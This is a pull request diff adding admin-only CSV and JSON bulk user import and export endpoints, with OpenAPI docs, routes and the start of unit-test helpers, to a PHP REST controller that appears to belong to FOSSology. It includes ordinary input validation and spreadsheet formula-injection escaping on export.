### PR TITLE
feat(api): add CSV/JSON import and export endpoints for users enpoint

### DIFF
--- a/src/www/ui/api/Controllers/UserController.php
+++ b/src/www/ui/api/Controllers/UserController.php
@@ -28,6 +28,7 @@ use Fossology\UI\Api\Models\Info;
 use Fossology\UI\Api\Models\InfoType;
 use Fossology\UI\Api\Models\TokenRequest;
 use Psr\Http\Message\ServerRequestInterface;
+use Slim\Psr7\Factory\StreamFactory;
 
 /**
  * @class UserController
@@ -143,6 +144,104 @@ class UserController extends RestController
 
     $returnVal = new Info(201, "User created successfully", InfoType::INFO);
     return $response->withJson($returnVal->getArray(), $returnVal->getCode());
+  }
+
+  /**
+   * Build a legacy user_add compatible request from an import row and
+   * create the user through the user_add plugin. Used only by the bulk
+   * CSV/JSON import in handleImportUsers() -- kept separate from addUser()
+   * so the single-user REST endpoint's behavior/validation is untouched by
+   * the bulk-import feature.
+   *
+   * Unlike addUser(), a creation failure is returned as [false, message]
+   * instead of thrown, so one bad row in a bulk import doesn't abort the
+   * rest of the file.
+   *
+   * Import rows are always parsed into the V2-shaped agents DTO (see
+   * AGENT_KEYS) by importRowToUserDetails(), regardless of which API
+   * version's URL the request came in on, so this always uses the V2 agent
+   * keys -- unlike addUser(), there is no V1 request shape to support here.
+   *
+   * @param array $userDetails Associative array from importRowToUserDetails()
+   *   (name, userPass, description, email, accessLevel, rootFolderId,
+   *   emailNotification, defaultBucketpool, agents{...}).
+   * @return array{0: bool, 1: string} [success, message or error]
+   */
+  protected function createUserFromImportRow($userDetails)
+  {
+    // Not empty(): empty("0") is true in PHP, which would wrongly reject
+    // the literal (if weak) password "0".
+    if (!is_string($userDetails['userPass'] ?? null) || $userDetails['userPass'] === '') {
+      return [false, "Password must be specified."];
+    }
+    $userHelper = new UserHelper();
+    $symfonyRequest = new \Symfony\Component\HttpFoundation\Request();
+    $symfonyRequest->request->set('username', $userDetails['name']);
+    $symfonyRequest->request->set('pass1', $userDetails['userPass']);
+    $symfonyRequest->request->set('pass2', $userDetails['userPass']);
+    $symfonyRequest->request->set('description', $userDetails['description'] ?? '');
+    $symfonyRequest->request->set('permission', $userHelper->getEquivalentValueForPermission($userDetails['accessLevel'] ?? null));
+    $symfonyRequest->request->set('folder', $userDetails['rootFolderId'] ?? '');
+    $symfonyRequest->request->set('enote', !empty($userDetails['emailNotification']) ? 'y' : 'n');
+    $symfonyRequest->request->set('email', $userDetails['email'] ?? '');
+    $symfonyRequest->request->set('public', $userDetails['defaultVisibility'] ?? '');
+    $symfonyRequest->request->set('default_bucketpool_fk', $userDetails['defaultBucketpool'] ?? 2);
+
+    $agents = $this->buildImportAgentCheckboxes($userDetails['agents'] ?? null);
+    $symfonyRequest->request->set('user_agent_list', userAgents($agents));
+
+    global $container;
+    $restHelper = $container->get('helper.restHelper');
+    $userAddObj = $restHelper->getPlugin('user_add');
+
+    $errMsg = $userAddObj->add($symfonyRequest);
+
+    if ($errMsg != '') {
+      return [false, $errMsg];
+    }
+    return [true, "User '" . $userDetails['name'] . "' created successfully."];
+  }
+
+  /**
+   * Translate a V2 agents DTO (bucket, copyrightEmailAuthor, ecc, keyword,
+   * mime, monk, nomos, ojo, reso) into the legacy Check_agent_* map
+   * expected by userAgents(). Used only by createUserFromImportRow(); every
+   * key in AGENT_KEYS must have a branch here -- a missing one is silently
+   * treated as "unchecked" rather than erroring.
+   *
+   * pkgagent, softwareHeritage and ipra are deliberately not in AGENT_KEYS
+   * and have no branch here: addUser()'s existing V2 handling of those
+   * three has a pre-existing key-mapping bug (unrelated to this feature,
+   * left untouched), so round-tripping them through import/export isn't
+   * reliable; imported users simply get those three left at their default
+   * (unchecked) rather than silently mis-mapped.
+   *
+   * @param array|string|null $agentsDto
+   * @return array<string, int>
+   */
+  private function buildImportAgentCheckboxes($agentsDto)
+  {
+    if (empty($agentsDto)) {
+      return array();
+    }
+    if (is_string($agentsDto)) { // If 'x-www-form-urlencoded', inner elements are not decoded
+      $agentsDto = json_decode($agentsDto, true);
+    }
+    $isChecked = function ($key) use ($agentsDto) {
+      return isset($agentsDto[$key]) && $agentsDto[$key] ? 1 : 0;
+    };
+
+    return array(
+      'Check_agent_mimetype' => $isChecked('mime'),
+      'Check_agent_monk' => $isChecked('monk'),
+      'Check_agent_ojo' => $isChecked('ojo'),
+      'Check_agent_bucket' => $isChecked('bucket'),
+      'Check_agent_copyright' => $isChecked('copyrightEmailAuthor'),
+      'Check_agent_ecc' => $isChecked('ecc'),
+      'Check_agent_keyword' => $isChecked('keyword'),
+      'Check_agent_nomos' => $isChecked('nomos'),
+      'Check_agent_reso' => $isChecked('reso'),
+    );
   }
 
   /**
@@ -311,5 +410,534 @@ class UserController extends RestController
     $res = $returnVal->getArray();
     $res[$tokenType . ($apiVersion == ApiVersion::V2 ? 'Tokens' : '_tokens')] = $finalTokens;
     return $response->withJson($res, $returnVal->getCode());
+  }
+
+  /**
+   * Agent DTO keys included in user export/import, in the same
+   * naming used by the addUser() V2 agents object (and by extension the
+   * REST User schema and the frontend's Add User form).
+   *
+   * pkgagent, softwareHeritage and ipra are intentionally excluded: issue
+   * #428 and the FOSSologyUI Operations page that consumes these endpoints
+   * don't require agent-setting fidelity, and addUser()'s existing V2
+   * handling of those three has a pre-existing key-mapping bug that's out
+   * of scope to fix here (see buildImportAgentCheckboxes()).
+   */
+  const AGENT_KEYS = [
+    'bucket', 'copyrightEmailAuthor', 'ecc', 'keyword', 'mime',
+    'monk', 'nomos', 'ojo', 'reso',
+  ];
+
+  /**
+   * Allowed values for the "delimiter" field of handleImportUsers(),
+   * matching the enum documented in openapiv2.yaml and the dropdown a
+   * standard admin UI is expected to offer.
+   */
+  const CSV_DELIMITERS = [',', ';', "\t"];
+
+  /**
+   * Allowed values for the "enclosure" field of handleImportUsers(),
+   * matching the enum documented in openapiv2.yaml.
+   */
+  const CSV_ENCLOSURES = ['"', "'"];
+
+  /**
+   * Export all users to a CSV or JSON file. The requested format comes from
+   * the "format" query parameter (?format=csv|json, defaults to csv), so
+   * this single /users/export handler backs both formats. "delimiter"/
+   * "enclosure" query parameters are validated against
+   * CSV_DELIMITERS/CSV_ENCLOSURES the same way handleImportUsers() does
+   * (see resolveCsvOption()), but only when format=csv; they're ignored
+   * entirely when format=json.
+   *
+   * @param ServerRequestInterface $request
+   * @param ResponseHelper $response
+   * @param array $args
+   * @return ResponseHelper
+   * @throws HttpBadRequestException if format is not 'csv'/'json', or if
+   *   delimiter/enclosure is set but not one of the allowed values
+   * @throws HttpErrorException
+   */
+  public function handleExportUsers($request, $response, $args)
+  {
+    $this->throwNotAdminException();
+    $queryParams = $request->getQueryParams();
+    $formatRaw = $queryParams['format'] ?? 'csv';
+    // Guard against a non-string value (e.g. ?format[]=csv, which PHP
+    // parses into an array) the same way resolveCsvOption() already
+    // guards delimiter/enclosure -- strtolower() on a non-string throws
+    // a TypeError on PHP 8 instead of hitting the clean 400 below.
+    $format = strtolower(is_string($formatRaw) ? $formatRaw : '');
+    if ($format !== 'csv' && $format !== 'json') {
+      throw new HttpBadRequestException("Invalid format '" . $format .
+        "'. Only 'csv' and 'json' are supported.");
+    }
+    if ($format === 'csv') {
+      $delimiter = $this->resolveCsvOption($queryParams['delimiter'] ?? null,
+        self::CSV_DELIMITERS, ',', 'delimiter');
+      $enclosure = $this->resolveCsvOption($queryParams['enclosure'] ?? null,
+        self::CSV_ENCLOSURES, '"', 'enclosure');
+    }
+    $users = $this->dbHelper->getUsers();
+    if ($format === 'json') {
+      return $this->exportUsersToJSON($response, $users);
+    }
+    return $this->exportUsersToCSV($response, $users, $delimiter, $enclosure);
+  }
+
+  /**
+   * Render the CSV export response body for handleExportUsers().
+   *
+   * @param ResponseHelper $response
+   * @param \Fossology\UI\Api\Models\User[] $users
+   * @param string $delimiter One of CSV_DELIMITERS
+   * @param string $enclosure One of CSV_ENCLOSURES
+   * @return ResponseHelper
+   */
+  private function exportUsersToCSV($response, $users, $delimiter = ',', $enclosure = '"')
+  {
+    $content = $this->generateUsersCsv($users, $delimiter, $enclosure);
+    $fileName = "fossology-users-export-" . date("YMj-Gis");
+    $newResponse = $response->withHeader('Content-type', 'text/csv, charset=UTF-8')
+      ->withHeader('Content-Disposition', 'attachment; filename=' . $fileName . '.csv')
+      ->withHeader('Pragma', 'no-cache')
+      ->withHeader('Cache-Control', 'no-cache, must-revalidate, maxage=1, post-check=0, pre-check=0')
+      ->withHeader('Expires', 'Expires: Thu, 19 Nov 1981 08:52:00 GMT');
+    $sf = new StreamFactory();
+    return $newResponse->withBody($sf->createStream($content));
+  }
+
+  /**
+   * Render the JSON export response body for handleExportUsers().
+   *
+   * @param ResponseHelper $response
+   * @param \Fossology\UI\Api\Models\User[] $users
+   * @return ResponseHelper
+   */
+  private function exportUsersToJSON($response, $users)
+  {
+    $content = json_encode($this->generateUsersExportArray($users), JSON_PRETTY_PRINT);
+    $fileName = "fossology-users-export-" . date("YMj-Gis");
+    $newResponse = $response->withHeader('Content-type', 'text/json, charset=UTF-8')
+      ->withHeader('Content-Disposition', 'attachment; filename=' . $fileName . '.json')
+      ->withHeader('Pragma', 'no-cache')
+      ->withHeader('Cache-Control', 'no-cache, must-revalidate, maxage=1, post-check=0, pre-check=0')
+      ->withHeader('Expires', 'Expires: Thu, 19 Nov 1981 08:52:00 GMT');
+    $sf = new StreamFactory();
+    return $newResponse->withBody($sf->createStream($content));
+  }
+
+  /**
+   * Import users from an uploaded CSV or JSON file (fileInput) via the
+   * single /users/import endpoint. The file extension of the upload
+   * determines the parser used -- there is no separate route per format.
+   *
+   * The uploaded rows are always parsed into the V2-shaped agents DTO (see
+   * AGENT_KEYS) regardless of which API version's URL the request came in
+   * on -- these endpoints are only documented in openapiv2.yaml, so
+   * createUserFromImportRow() always builds the V2 agent keys. This avoids
+   * silently dropping agent flags for a request that happened to reach
+   * this shared '/users' route group via the /repo/api/v1 prefix.
+   *
+   * For CSV, "delimiter"/"enclosure" are validated against
+   * CSV_DELIMITERS/CSV_ENCLOSURES (see resolveCsvOption()) -- a value
+   * outside that fixed set is rejected rather than truncated.
+   *
+   * @param ServerRequestInterface $request
+   * @param ResponseHelper $response
+   * @param array $args
+   * @return ResponseHelper
+   * @throws HttpBadRequestException if delimiter/enclosure is set but not
+   *   one of the allowed values
+   * @throws HttpErrorException
+   */
+  public function handleImportUsers($request, $response, $args)
+  {
+    $this->throwNotAdminException();
+    $symReq = \Symfony\Component\HttpFoundation\Request::createFromGlobals();
+    $uploadedFile = $symReq->files->get('fileInput', null);
+
+    if (!($uploadedFile instanceof \Symfony\Component\HttpFoundation\File\UploadedFile)) {
+      throw new HttpBadRequestException("No file selected");
+    }
+    if ($uploadedFile->getError() !== UPLOAD_ERR_OK) {
+      throw new HttpBadRequestException($uploadedFile->getErrorMessage());
+    }
+
+    $extension = strtolower($uploadedFile->getClientOriginalExtension());
+    if ($extension !== 'csv' && $extension !== 'json') {
+      throw new HttpBadRequestException("Invalid file extension '" . $extension .
+        "' of file " . $uploadedFile->getClientOriginalName() .
+        ". Only csv and json files are supported.");
+    }
+
+    if ($extension === 'csv') {
+      $requestBody = $this->getParsedBody($request) ?? [];
+      $delimiter = $this->resolveCsvOption($requestBody['delimiter'] ?? null,
+        self::CSV_DELIMITERS, ',', 'delimiter');
+      $enclosure = $this->resolveCsvOption($requestBody['enclosure'] ?? null,
+        self::CSV_ENCLOSURES, '"', 'enclosure');
+      $userRows = $this->parseUsersCsv($uploadedFile->getRealPath(), $delimiter, $enclosure);
+    } else {
+      $userRows = $this->parseUsersJson($uploadedFile->getRealPath());
+    }
+
+    if ($userRows === false) {
+      throw new HttpBadRequestException("Uploaded file is empty or malformed.");
+    }
+    if (empty($userRows)) {
+      throw new HttpBadRequestException("No users found in the uploaded file.");
+    }
+
+    $successCount = 0;
+    $errors = [];
+    foreach ($userRows as $index => $userDetails) {
+      // CSV rows carry their physical file line number; JSON rows (which
+      // have no comparable notion of a skipped line) fall back to their
+      // position among the parsed rows.
+      $rowLabel = $userDetails['_csvLineNumber'] ?? ($index + 1);
+      unset($userDetails['_csvLineNumber']);
+      if (empty($userDetails['name'])) {
+        $errors[] = "Row " . $rowLabel . ": Username must be specified.";
+        continue;
+      }
+      list($success, $message) = $this->createUserFromImportRow($userDetails);
+      if ($success) {
+        $successCount++;
+      } else {
+        $errors[] = "Row " . $rowLabel . " ('" . $userDetails['name'] . "'): " . $message;
+      }
+    }
+
+    $summary = "$successCount of " . count($userRows) . " user(s) imported successfully.";
+    if (!empty($errors)) {
+      $summary .= "\n" . implode("\n", $errors);
+    }
+
+    if ($successCount === 0) {
+      throw new HttpBadRequestException($summary);
+    }
+
+    $newInfo = new Info(200, $summary, InfoType::INFO);
+    return $response->withJson($newInfo->getArray(), $newInfo->getCode());
+  }
+
+  /**
+   * Resolve a CSV "delimiter"/"enclosure" form field against its fixed
+   * enum (CSV_DELIMITERS/CSV_ENCLOSURES), enforcing the contract
+   * documented in openapiv2.yaml. A missing/empty/non-string value
+   * (e.g. a malformed multipart array) is treated as "not provided" and
+   * falls back to $default rather than erroring, since that's a client
+   * quirk rather than a deliberate selection; a present string value
+   * that isn't one of $allowed is rejected outright.
+   *
+   * @param mixed $value Raw value from the parsed multipart body, or null.
+   * @param string[] $allowed Allowed single-byte values, e.g. CSV_DELIMITERS.
+   * @param string $default Value to use when $value is missing/empty/non-string.
+   * @param string $fieldName Field name, for the error message.
+   * @return string
+   * @throws HttpBadRequestException if $value is a string but not in $allowed.
+   */
+  private function resolveCsvOption($value, array $allowed, $default, $fieldName)
+  {
+    if (!is_string($value) || $value === '') {
+      return $default;
+    }
+    if (!in_array($value, $allowed, true)) {
+      $allowedDesc = implode(', ', array_map(function ($option) {
+        return $option === "\t" ? 'tab' : "'" . $option . "'";
+      }, $allowed));
+      throw new HttpBadRequestException("Invalid " . $fieldName . ". Must be one of: " .
+        $allowedDesc . ".");
+    }
+    return $value;
+  }
+
+  /**
+   * Build the (nested) export DTO for a single user, ready to be
+   * json_encode()'d directly or flattened for a CSV row by
+   * flattenExportRowForCsv(). Translates Analysis::getArray(V2)'s
+   * "mimetype" key back to "mime" so the export stays symmetric with the
+   * rest of the V2 API (addUser DTO, Analysis::setUsingArray).
+   *
+   * @param \Fossology\UI\Api\Models\User $user
+   * @return array
+   */
+  private function exportRowFromUser($user)
+  {
+    $userArray = $user->getArray(ApiVersion::V2);
+    $agents = $userArray['agents'] ?? [];
+    $row = [
+      'id' => $userArray['id'] ?? null,
+      'name' => $userArray['name'] ?? '',
+      'description' => $userArray['description'] ?? '',
+      'email' => $userArray['email'] ?? '',
+      'accessLevel' => $userArray['accessLevel'] ?? '',
+      'rootFolderId' => $userArray['rootFolderId'] ?? '',
+      'defaultGroup' => $userArray['defaultGroup'] ?? null,
+      'emailNotification' => $userArray['emailNotification'] ?? false,
+      'defaultBucketpool' => $userArray['defaultBucketpool'] ?? null,
+      'agents' => [],
+    ];
+    foreach (self::AGENT_KEYS as $agentKey) {
+      $sourceKey = $agentKey === 'mime' ? 'mimetype' : $agentKey;
+      $row['agents'][$agentKey] = $agents[$sourceKey] ?? false;
+    }
+    return $row;
+  }
+
+  /**
+   * Flatten a nested exportRowFromUser() row into a single-level array
+   * with "agent_xxx" columns, suitable for a CSV row.
+   *
+   * @param array $row
+   * @return array
+   */
+  private function flattenExportRowForCsv($row)
+  {
+    $flat = $row;
+    $agents = $flat['agents'];
+    unset($flat['agents']);
+    foreach ($agents as $agentKey => $value) {
+      $flat['agent_' . $agentKey] = $value;
+    }
+    return $flat;
+  }
+
+  /**
+   * CSV header / column order used by both generateUsersCsv() and
+   * flattenExportRowForCsv().
+   *
+   * @return string[]
+   */
+  private function csvHeader()
+  {
+    $agentColumns = array_map(function ($agentKey) {
+      return 'agent_' . $agentKey;
+    }, self::AGENT_KEYS);
+    return array_merge([
+      'id', 'name', 'description', 'email', 'accessLevel', 'rootFolderId',
+      'defaultGroup', 'emailNotification', 'defaultBucketpool',
+    ], $agentColumns);
+  }
+
+  /**
+   * Export all users to a JSON-ready array of nested user DTOs.
+   *
+   * @param \Fossology\UI\Api\Models\User[] $users
+   * @return array[]
+   */
+  private function generateUsersExportArray($users)
+  {
+    return array_map(function ($user) {
+      return $this->exportRowFromUser($user);
+    }, $users);
+  }
+
+  /**
+   * Generate a CSV document listing all given users.
+   *
+   * @param \Fossology\UI\Api\Models\User[] $users
+   * @param string $delimiter One of CSV_DELIMITERS
+   * @param string $enclosure One of CSV_ENCLOSURES
+   * @return string CSV content
+   */
+  private function generateUsersCsv($users, $delimiter = ',', $enclosure = '"')
+  {
+    $out = fopen('php://temp', 'r+');
+    $header = $this->csvHeader();
+    fputcsv($out, $header, $delimiter, $enclosure);
+    foreach ($users as $user) {
+      $flat = $this->flattenExportRowForCsv($this->exportRowFromUser($user));
+      $csvRow = [];
+      foreach ($header as $field) {
+        $value = $flat[$field];
+        if (is_bool($value)) {
+          $csvRow[] = $value ? 1 : 0;
+        } else {
+          $csvRow[] = $this->escapeCsvFormula($value);
+        }
+      }
+      fputcsv($out, $csvRow, $delimiter, $enclosure);
+    }
+    rewind($out);
+    $content = stream_get_contents($out);
+    fclose($out);
+    return $content;
+  }
+
+  /**
+   * Neutralize CSV/spreadsheet formula injection: user-controlled fields
+   * (name, description, email) are exported verbatim, and a value starting
+   * with =, +, -, @ or a tab/CR is interpreted as a formula by Excel/
+   * LibreOffice/Sheets when the file is opened. Prefixing with a single
+   * quote keeps the value readable while forcing it to be treated as text.
+   *
+   * @param mixed $value
+   * @return mixed
+   */
+  private function escapeCsvFormula($value)
+  {
+    if (!is_string($value) || $value === '') {
+      return $value;
+    }
+    if (strpbrk($value[0], "=+-@\t\r") !== false) {
+      return "'" . $value;
+    }
+    return $value;
+  }
+
+  /**
+   * Convert a single import row into the createUserFromImportRow() DTO
+   * shape. Accepts
+   * either a CSV row (flat, with "agent_xxx" columns) or a JSON row
+   * (optionally with a nested "agents" object) -- whichever shape is
+   * present is used. Unknown/extra keys (e.g. id, defaultGroup) are
+   * ignored.
+   *
+   * "userPass" is read here (column/field name "userPass" in both CSV
+   * and JSON, same as the other non-agent fields) but is never produced
+   * by exportRowFromUser()/generateUsersExportArray() -- passwords
+   * aren't stored in a recoverable form, so a file exported from
+   * /users/export needs a userPass column/field added before it can be
+   * re-imported. createUserFromImportRow() rejects the row if this is
+   * empty.
+   *
+   * @param array $row
+   * @return array
+   */
+  private function importRowToUserDetails($row)
+  {
+    $toBool = function ($value) {
+      return filter_var($value, FILTER_VALIDATE_BOOLEAN);
+    };
+    $agentsSource = isset($row['agents']) && is_array($row['agents']) ? $row['agents'] : $row;
+
+    $agents = [];
+    foreach (self::AGENT_KEYS as $agentKey) {
+      $value = $agentsSource[$agentKey] ?? $agentsSource['agent_' . $agentKey] ?? false;
+      $agents[$agentKey] = $toBool($value);
+    }
+
+    return [
+      'name' => trim((string) ($row['name'] ?? '')),
+      'userPass' => $row['userPass'] ?? '',
+      'description' => $row['description'] ?? '',
+      'email' => $row['email'] ?? '',
+      'accessLevel' => $row['accessLevel'] ?? '',
+      'rootFolderId' => $row['rootFolderId'] ?? '',
+      'emailNotification' => $toBool($row['emailNotification'] ?? false),
+      'defaultBucketpool' => $row['defaultBucketpool'] ?? null,
+      'agents' => $agents,
+    ];
+  }
+
+  /**
+   * Parse an uploaded CSV file of users into an array of
+   * createUserFromImportRow() DTOs. Each DTO carries an internal
+   * "_csvLineNumber" key (the physical line in the file, header = line
+   * 1, accounting for embedded newlines in earlier quoted fields) that
+   * handleImportUsers() uses for its per-row error messages and strips
+   * before passing the DTO on.
+   *
+   * @param string $filePath Path to the uploaded file on disk
+   * @param string $delimiter CSV column delimiter
+   * @param string $enclosure CSV field enclosure
+   * @return array[]|false List of user DTOs, or false on unreadable file
+   *   or a header with a duplicate column name
+   */
+  private function parseUsersCsv($filePath, $delimiter, $enclosure)
+  {
+    $handle = @fopen($filePath, 'r');
+    if ($handle === false) {
+      return false;
+    }
+    $header = fgetcsv($handle, 0, $delimiter, $enclosure);
+    if ($header === false) {
+      fclose($handle);
+      return false;
+    }
+    // Strip a leading UTF-8 BOM (e.g. from Excel's "CSV UTF-8" export, or
+    // a /users/export?format=csv file re-saved through Excel) from the
+    // first header cell -- trim() does not remove it, and left in place
+    // it silently turns the "name" column into an unmatched "\xEF\xBB\xBFname"
+    // key, making every row look like it has no username.
+    if (isset($header[0])) {
+      $header[0] = preg_replace('/^\xEF\xBB\xBF/', '', $header[0]);
+    }
+    $header = array_map('trim', $header);
+    if (count($header) !== count(array_unique($header))) {
+      // array_combine() below would otherwise silently keep only the
+      // last column's value for a repeated header name (e.g.
+      // "name,email,name"), discarding the rest with no error.
+      fclose($handle);
+      return false;
+    }
+    $rows = [];
+    $lineNumber = 1; // the header itself is physical line 1
+    while (($data = fgetcsv($handle, 0, $delimiter, $enclosure)) !== false) {
+      // A quoted field may embed a newline, making fgetcsv() consume
+      // more than one physical line for a single logical row; count
+      // those too so later rows' _csvLineNumber stays accurate.
+      $lineNumber++;
+      $rowStartLine = $lineNumber;
+      foreach ($data as $field) {
+        $lineNumber += substr_count((string) $field, "\n");
+      }
+      if (count($data) === 1 && trim((string) $data[0]) === '') {
+        continue; // skip blank lines
+      }
+      // Normalize row length to the header, tolerating ragged CSV rows.
+      $data = array_pad(array_slice($data, 0, count($header)), count($header), '');
+      $row = array_combine($header, $data);
+      $userDetails = $this->importRowToUserDetails($row);
+      $userDetails['_csvLineNumber'] = $rowStartLine;
+      $rows[] = $userDetails;
+    }
+    fclose($handle);
+    return $rows;
+  }
+
+  /**
+   * Parse an uploaded JSON file of users into an array of
+   * createUserFromImportRow() DTOs.
+   * Accepts a raw array of user objects, a single user object, or an
+   * object with a "users" array property (as produced by the JSON export).
+   *
+   * A single user object is detected by shape (not-a-list), not by the
+   * presence of a "name" key -- a malformed single object missing "name"
+   * is still wrapped as one row, so it surfaces as a normal per-row
+   * "Username must be specified" error instead of being misread as a
+   * bag of scalar values and silently producing zero rows.
+   *
+   * @param string $filePath Path to the uploaded file on disk
+   * @return array[]|false List of user DTOs, or false on malformed JSON
+   */
+  private function parseUsersJson($filePath)
+  {
+    $content = @file_get_contents($filePath);
+    if ($content === false) {
+      return false;
+    }
+    $data = json_decode($content, true);
+    if (json_last_error() !== JSON_ERROR_NONE || !is_array($data)) {
+      return false;
+    }
+    // PHP 7.4-compatible array_is_list() (added in PHP 8.1, below the
+    // 7.4.3 minimum in composer.json).
+    $isList = $data === [] || array_keys($data) === range(0, count($data) - 1);
+    if (array_key_exists('users', $data) && is_array($data['users'])) {
+      $data = $data['users'];
+    } elseif (!$isList) {
+      $data = [$data];
+    }
+    $rows = [];
+    foreach ($data as $entry) {
+      if (!is_array($entry)) {
+        continue;
+      }
+      $rows[] = $this->importRowToUserDetails($entry);
+    }
+    return $rows;
   }
 }

--- a/src/www/ui/api/documentation/openapiv2.yaml
+++ b/src/www/ui/api/documentation/openapiv2.yaml
@@ -2691,6 +2691,137 @@ paths:
 
         default:
           $ref: '#/components/responses/defaultResponse'
+  /users/import:
+    post:
+      operationId: importUsers
+      tags:
+        - User
+        - Admin
+      summary: Import users from a CSV or JSON file
+      description: >
+        Bulk create users from an uploaded CSV or JSON file, in the
+        format produced by /users/export. Parser is chosen by the
+        fileInput extension. Row failures don't stop the rest of the
+        file; see "message" for a per-row summary.
+      requestBody:
+        description: Users CSV or JSON file to import.
+        required: true
+        content:
+          multipart/form-data:
+            schema:
+              type: object
+              properties:
+                fileInput:
+                  type: string
+                  format: binary
+                  description: CSV or JSON file to import.
+                delimiter:
+                  type: string
+                  description: >
+                    CSV column delimiter (comma, semicolon, or tab).
+                    Ignored for JSON.
+                  enum: [",", ";", "\t"]
+                  default: ","
+                enclosure:
+                  type: string
+                  description: >
+                    CSV field enclosure (double or single quote).
+                    Ignored for JSON.
+                  enum: ['"', "'"]
+                  default: '"'
+              required:
+                - fileInput
+      responses:
+        '200':
+          description: >
+            At least one row imported; "message" has a per-row summary.
+          content:
+            application/json:
+              schema:
+                $ref: '#/components/schemas/Info'
+        '400':
+          description: >
+            Invalid file, delimiter, or enclosure, or every row failed
+            (see "message" for details).
+          content:
+            application/json:
+              schema:
+                $ref: '#/components/schemas/Info'
+        '403':
+          description: The session owner is not an admin
+          content:
+            application/json:
+              schema:
+                $ref: '#/components/schemas/Info'
+        default:
+          $ref: '#/components/responses/defaultResponse'
+  /users/export:
+    get:
+      operationId: exportUsers
+      tags:
+        - User
+        - Admin
+      summary: Export all users as CSV or JSON
+      description: >
+        Export all users as CSV or JSON, using the UserImportExport
+        shape. Output is re-importable via /users/import as-is.
+      parameters:
+        - name: format
+          in: query
+          description: Export format, case-insensitive.
+          required: false
+          schema:
+            type: string
+            enum: [csv, json]
+            default: csv
+          example: csv
+        - name: delimiter
+          in: query
+          description: >
+            CSV column delimiter (comma, semicolon, or tab). Ignored
+            when format=json.
+          required: false
+          schema:
+            type: string
+            enum: [",", ";", "\t"]
+            default: ","
+        - name: enclosure
+          in: query
+          description: >
+            CSV field enclosure (double or single quote). Ignored when
+            format=json.
+          required: false
+          schema:
+            type: string
+            enum: ['"', "'"]
+            default: '"'
+      responses:
+        '200':
+          description: Successfully exported
+          content:
+            text/csv:
+              schema:
+                type: string
+                format: binary
+            text/json:
+              schema:
+                type: array
+                items:
+                  $ref: '#/components/schemas/UserImportExport'
+        '400':
+          description: Invalid format, delimiter, or enclosure.
+          content:
+            application/json:
+              schema:
+                $ref: '#/components/schemas/Info'
+        '403':
+          description: The session owner is not an admin
+          content:
+            application/json:
+              schema:
+                $ref: '#/components/schemas/Info'
+        default:
+          $ref: '#/components/responses/defaultResponse'
 
   /uploads/{id}/item/{itemId}/copyrights:
     parameters: *cxGetParams
@@ -6164,6 +6295,77 @@ components:
         kotoba:
           type: boolean
           description: Should Kotoba Bulk Analysis be run on this upload.
+    UserImportExportAgents:
+      type: object
+      description: >
+        Agent flags used by /users/import and /users/export. Excludes
+        pkgagent, softwareHeritage, ipra and kotoba.
+      properties:
+        bucket:
+          type: boolean
+        copyrightEmailAuthor:
+          type: boolean
+        ecc:
+          type: boolean
+        keyword:
+          type: boolean
+        mime:
+          type: boolean
+        monk:
+          type: boolean
+        nomos:
+          type: boolean
+        ojo:
+          type: boolean
+        reso:
+          type: boolean
+    UserImportExport:
+      type: object
+      description: >
+        A single user row, as returned by /users/export?format=json and
+        accepted by /users/import. The CSV form flattens "agents" into
+        agent_bucket, agent_ecc, etc. columns.
+      properties:
+        id:
+          type: integer
+          nullable: true
+          description: Informational on export; ignored on import.
+        name:
+          type: string
+          description: Unique username. Required on import.
+        userPass:
+          type: string
+          description: >
+            Plaintext new-account password. Required on import; omitted
+            from /users/export output.
+        description:
+          type: string
+        email:
+          type: string
+        accessLevel:
+          type: string
+          enum:
+            - none
+            - read_only
+            - read_write
+            - clearing_admin
+            - admin
+        rootFolderId:
+          type: number
+          format: int
+        defaultGroup:
+          type: string
+          nullable: true
+          description: Informational on export; ignored on import.
+        emailNotification:
+          type: boolean
+        defaultBucketpool:
+          type: integer
+          nullable: true
+        agents:
+          $ref: '#/components/schemas/UserImportExportAgents'
+      required:
+        - name
     Reuser:
       type: object
       properties:

--- a/src/www/ui/api/index.php
+++ b/src/www/ui/api/index.php
@@ -288,6 +288,8 @@ $app->group('/uploads',
 $app->group('/users',
   function (\Slim\Routing\RouteCollectorProxy $app) use ($pattern) {
     $app->get('/self', UserController::class . ':getCurrentUser');
+    $app->post('/import', UserController::class . ':handleImportUsers');
+    $app->get('/export', UserController::class . ':handleExportUsers');
     $app->get("[/{pathParam:$pattern}]", UserController::class . ':getUsers');
     $app->put("/{pathParam:$pattern}", UserController::class . ':updateUser');
     $app->post('', UserController::class . ':addUser');

--- a/src/www/ui_tests/api/Controllers/UserControllerTest.php
+++ b/src/www/ui_tests/api/Controllers/UserControllerTest.php
@@ -16,6 +16,7 @@ require_once dirname(__DIR__, 4) . '/lib/php/Plugin/FO_Plugin.php';
 
 use Fossology\Lib\Auth\Auth;
 use Fossology\UI\Api\Exceptions\HttpBadRequestException;
+use Fossology\UI\Api\Exceptions\HttpForbiddenException;
 use Fossology\UI\Api\Exceptions\HttpNotFoundException;
 use Mockery as M;
 use Fossology\UI\Api\Controllers\UserController;
@@ -431,5 +432,1084 @@ class UserControllerTest extends \PHPUnit\Framework\TestCase
     $this->expectExceptionMessage("Username must be specified.");
 
     $this->userController->addUser($request, new ResponseHelper(), []);
+  }
+
+  /**
+   * Invoke a private/protected method via reflection.
+   *
+   * @param object $object
+   * @param string $method
+   * @param array $args
+   * @return mixed
+   */
+  private function invokePrivate($object, $method, array $args)
+  {
+    $reflection = new \ReflectionClass(get_class($object));
+    $m = $reflection->getMethod($method);
+    $m->setAccessible(true);
+    return $m->invokeArgs($object, $args);
+  }
+
+  /**
+   * Register $_FILES['fileInput'] pointing at a real file on disk, mimicking
+   * a multipart file upload without needing a real HTTP request.
+   *
+   * @param string $path
+   * @param string $originalName
+   */
+  private function setUploadedFile($path, $originalName)
+  {
+    $_FILES['fileInput'] = [
+      'name' => $originalName,
+      'type' => 'application/octet-stream',
+      'tmp_name' => $path,
+      'error' => UPLOAD_ERR_OK,
+      'size' => filesize($path),
+    ];
+  }
+
+  /**
+   * @param string $content
+   * @param string $suffix
+   * @return string Path to a temp file, auto-deleted at process exit
+   */
+  private function writeTempFile($content, $suffix)
+  {
+    $path = tempnam(sys_get_temp_dir(), 'fo_user_import_') . $suffix;
+    file_put_contents($path, $content);
+    register_shutdown_function(function () use ($path) {
+      @unlink($path);
+    });
+    return $path;
+  }
+
+  /**
+   * @param array $createUserReturn|null Fixed [success, message] return, or
+   *   null to configure the mock with andReturnUsing() separately.
